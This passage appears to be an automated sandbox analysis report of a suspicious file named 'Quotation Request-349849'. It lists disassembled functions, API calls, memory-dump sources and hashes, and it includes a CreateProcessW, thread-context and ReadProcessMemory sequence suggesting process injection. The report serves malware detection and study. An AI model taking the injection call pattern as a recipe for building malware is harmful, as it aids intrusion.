                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
                                                      • Instruction ID: f1f7a051a22b39b3b4a94103fc8461846801d692b964fbcacc37513e3b2dece7
                                                      • Opcode Fuzzy Hash: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
                                                      • Instruction Fuzzy Hash: 1AE08632181714B7E7222B54EC09FCA7B19FB46762F104120FB54A90E187B5151197D8
                                                      Function 00838D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00838D1B
                                                        • Part of subcall function 007F2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9A24), ref: 007F2D69
                                                        • Part of subcall function 007F2D55: GetLastError.KERNEL32(00000000,?,007F9A24), ref: 007F2D7B
                                                      • _free.LIBCMT ref: 00838D2C
                                                      • _free.LIBCMT ref: 00838D3E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                      • Instruction ID: 2ab5cb4b9dba3bdf2d347553e527ec451e439962b47e0ca4e38f1514bc8963dc
                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                      • Instruction Fuzzy Hash: AEE012A1701709C6DF24A578A945AA313DC9F98352B14091DB50DD7287CE68F8438164
                                                      Function 007DA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: 73c3e23fcf1a2d37ff0860b8758573e72b4294d744d1e9073a358524d62f3ce9
                                                      • Instruction ID: 7ccd7026de68cd4867dc1a679e2ff8afbf04f3650bd4f3fab02ad83b46812dad
                                                      • Opcode Fuzzy Hash: 73c3e23fcf1a2d37ff0860b8758573e72b4294d744d1e9073a358524d62f3ce9
                                                      • Instruction Fuzzy Hash: F9224B70508201DFCB24DF14C495A6AB7F1FF84314F19896EE98A9B362D739ED85CB82
                                                      Function 007D4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: 5e39902c4aa5aeadb710cadad6c84017b37f3147602d6f54640f5e1f761ee2d4
                                                      • Instruction ID: 1524d8d2896e33212c5b4912194b643fb0e01aeaf16783396d0133971259facd
                                                      • Opcode Fuzzy Hash: 5e39902c4aa5aeadb710cadad6c84017b37f3147602d6f54640f5e1f761ee2d4
                                                      • Instruction Fuzzy Hash: 10414861B04258ABDF219B64CC957BE7BB3EB45300F284477EE86DA382D63C9D4483A1
                                                      Function 008377B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 3ead9eb11a7a88a66379414eca88ae24bc3e49762ab4e0552c745a04d14b9f59
                                                      • Instruction ID: a26931a462d127eda43f9410f0366db7612ea715ddb635bf7792e37780117e8f
                                                      • Opcode Fuzzy Hash: 3ead9eb11a7a88a66379414eca88ae24bc3e49762ab4e0552c745a04d14b9f59
                                                      • Instruction Fuzzy Hash: C441C7B1508209DBCB20EFA8D8899BAB7B4FF89304F244469E245D7342DB79DC01D7E4
                                                      Function 007D7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                      • Instruction ID: 5c8f7181d6425f4b053afcdd77b3b0bbb05ff75a19f4fdfd60ae44d97d518f5d
                                                      • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                      • Instruction Fuzzy Hash: 0B3173B5604606AFC708DF6CC8D1D69B3A9FF88320715C62AE519CB391EB34E950CB90
                                                      Function 007D47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 007D4834
                                                        • Part of subcall function 007F336C: __lock.LIBCMT ref: 007F3372
                                                        • Part of subcall function 007F336C: DecodePointer.KERNEL32(00000001,?,007D4849,00827C74), ref: 007F337E
                                                        • Part of subcall function 007F336C: EncodePointer.KERNEL32(?,?,007D4849,00827C74), ref: 007F3389
                                                        • Part of subcall function 007D48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007D4915
                                                        • Part of subcall function 007D48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D492A
                                                        • Part of subcall function 007D3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B68
                                                        • Part of subcall function 007D3B3A: IsDebuggerPresent.KERNEL32 ref: 007D3B7A
                                                        • Part of subcall function 007D3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008952F8,008952E0,?,?), ref: 007D3BEB
                                                        • Part of subcall function 007D3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C6F
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D4874
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: 5a1d3750560e82a32929ef292053fbfb010fff10bcb75391bde2ce38cf58f765
                                                      • Instruction ID: 42724fed4319c404e51756dbeaa816a650d25d083ba697d4f645047964f96ac7
                                                      • Opcode Fuzzy Hash: 5a1d3750560e82a32929ef292053fbfb010fff10bcb75391bde2ce38cf58f765
                                                      • Instruction Fuzzy Hash: 861189719083459FC700EFA9E80990ABBF8FF89B50F14491BF140932B1DBB4A648CB92
                                                      Function 007F0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007F571C: __FF_MSGBANNER.LIBCMT ref: 007F5733
                                                        • Part of subcall function 007F571C: __NMSG_WRITE.LIBCMT ref: 007F573A
                                                        • Part of subcall function 007F571C: RtlAllocateHeap.NTDLL(01530000,00000000,00000001,00000000,?,?,?,007F0DD3,?), ref: 007F575F
                                                      • std::exception::exception.LIBCMT ref: 007F0DEC
                                                      • __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                        • Part of subcall function 007F859B: RaiseException.KERNEL32(?,?,?,00889E78,00000000,?,?,?,?,007F0E06,?,00889E78,?,00000001), ref: 007F85F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: 46e0a3a2e60f9ebe6a158228c424fd40d76a1069796431b519c9e4a5fa05b1ca
                                                      • Instruction ID: d8dc44ec3c26cd25c68274b80c90d4381891a39b321862e7e3f1b47a538b097d
                                                      • Opcode Fuzzy Hash: 46e0a3a2e60f9ebe6a158228c424fd40d76a1069796431b519c9e4a5fa05b1ca
                                                      • Instruction Fuzzy Hash: 48F0A43190021EA6CB10BBE8EC099FE7BACEF01351F104469FB14D6382DFB89A5486D1
                                                      Function 007F53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      • __lock_file.LIBCMT ref: 007F53EB
                                                        • Part of subcall function 007F6C11: __lock.LIBCMT ref: 007F6C34
                                                      • __fclose_nolock.LIBCMT ref: 007F53F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 5d4faf905433a1a3e1de37217a216b23c39ced3d7a6be8751fd2bd2f39139403
                                                      • Instruction ID: c0671fae0674d368000f8b5f76220fce69f6574397104508ba7a6a55c38c0980
                                                      • Opcode Fuzzy Hash: 5d4faf905433a1a3e1de37217a216b23c39ced3d7a6be8751fd2bd2f39139403
                                                      • Instruction Fuzzy Hash: DAF09071900A0CDADB51AB79D80A7BD66A06F41378F248209A764AB3C1CBFC9941AB52
                                                      Function 015EA535 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015EACF3
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015EAD89
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015EADAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                      • Instruction ID: 507c0b0f2ff20fa064e9ad4551d83a8feaae431b222ab3b80b4c55309a0f152e
                                                      • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                      • Instruction Fuzzy Hash: 1E12DD20E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                      Function 007F0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: cd74a2443cbee5d9116be2cdd5c18865a5da2d72c7552e1860fddd5c8ad97f53
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 2931B3B4A00109DBC718DF58C484AB9F7A6FB59300B6487A5E90ACB356D735EDC1DBE0
                                                      Function 0080FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 4e93a2348349842645fe681bc48fa0537b4cc2923c50ea90630ec1bd2a8fb74f
                                                      • Instruction ID: 12cb9b416569c9f753e632c600974015d649269355e42285487207fc710b0d79
                                                      • Opcode Fuzzy Hash: 4e93a2348349842645fe681bc48fa0537b4cc2923c50ea90630ec1bd2a8fb74f
                                                      • Instruction Fuzzy Hash: D041F574604341DFDB24DF24C448B1ABBF1BF49318F0989ADE99A8B762C735E845CB52
                                                      Function 007D7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 66c49cc6fea7a12b5432c8a9c0b4766653cbee5645b94185eca40a658dd628e5
                                                      • Instruction ID: 448431d25ecdc597c7078738a9e6eca76264bd2104899f2ccf28cfca94bd1dde
                                                      • Opcode Fuzzy Hash: 66c49cc6fea7a12b5432c8a9c0b4766653cbee5645b94185eca40a658dd628e5
                                                      • Instruction Fuzzy Hash: 382106B2614A09EBEB148F29EC4177A7BB4FF14350F25882FE486C52A1EB3181D0D745
                                                      Function 007D4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007D4BEF
                                                        • Part of subcall function 007F525B: __wfsopen.LIBCMT ref: 007F5266
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4E0F
                                                        • Part of subcall function 007D4B6A: FreeLibrary.KERNEL32(00000000), ref: 007D4BA4
                                                        • Part of subcall function 007D4C70: _memmove.LIBCMT ref: 007D4CBA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: a4f3bfbd3af72a55746849b6536173333defeb0771672297f3e7ae0c7957b498
                                                      • Instruction ID: 9fc4a7f02e160425aae30e30c51962510ac80dc2cac208bca9f0cf2426344c77
                                                      • Opcode Fuzzy Hash: a4f3bfbd3af72a55746849b6536173333defeb0771672297f3e7ae0c7957b498
                                                      • Instruction Fuzzy Hash: 0D119431600305FBCF15AFB4CC1AF6D77B5BF44710F10882AF545A7281DA7999059751
                                                      Function 0080FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: f1e8f4a0fefb3b7be5ddc56707f0f0965416d73aa1331844c0bd00e2722833af
                                                      • Instruction ID: 558876bca8180884a290818353d31e5687e907359135de4a330aed179d20709c
                                                      • Opcode Fuzzy Hash: f1e8f4a0fefb3b7be5ddc56707f0f0965416d73aa1331844c0bd00e2722833af
                                                      • Instruction Fuzzy Hash: A7212274A08301DFCB14DF24C844A2ABBF1BF88314F05896CE98A87722D735E808CB92
                                                      Function 007F4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 007F48A6
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: 179d28f0e75c59782523a142346dc1aaa85df3447fcd0448daef161b59574fa6
                                                      • Instruction ID: 21016ff55a2af92c4da68b2f20b766afb2624137ef0a00fd9dad3e913ea9ad98
                                                      • Opcode Fuzzy Hash: 179d28f0e75c59782523a142346dc1aaa85df3447fcd0448daef161b59574fa6
                                                      • Instruction Fuzzy Hash: D3F02D3290064CEBEF51AFB4CC0A3BF36A0AF00360F048404F620AA381CBBC8A50DB52
                                                      Function 007D4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4E7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 33be9a8a66be74de857e9b8d50ba130c6efb8e5e59ea9473efeafd76b709e02c
                                                      • Instruction ID: 3ee4031154aec998dab3d3016e9641e8f189e60c754b258af396a3c3c7924c7c
                                                      • Opcode Fuzzy Hash: 33be9a8a66be74de857e9b8d50ba130c6efb8e5e59ea9473efeafd76b709e02c
                                                      • Instruction Fuzzy Hash: 19F03971501B11EFCB349F64E494822BBF1BF143293208A3FE2D682720C73A9840DF40
                                                      Function 007F0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F07B0
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
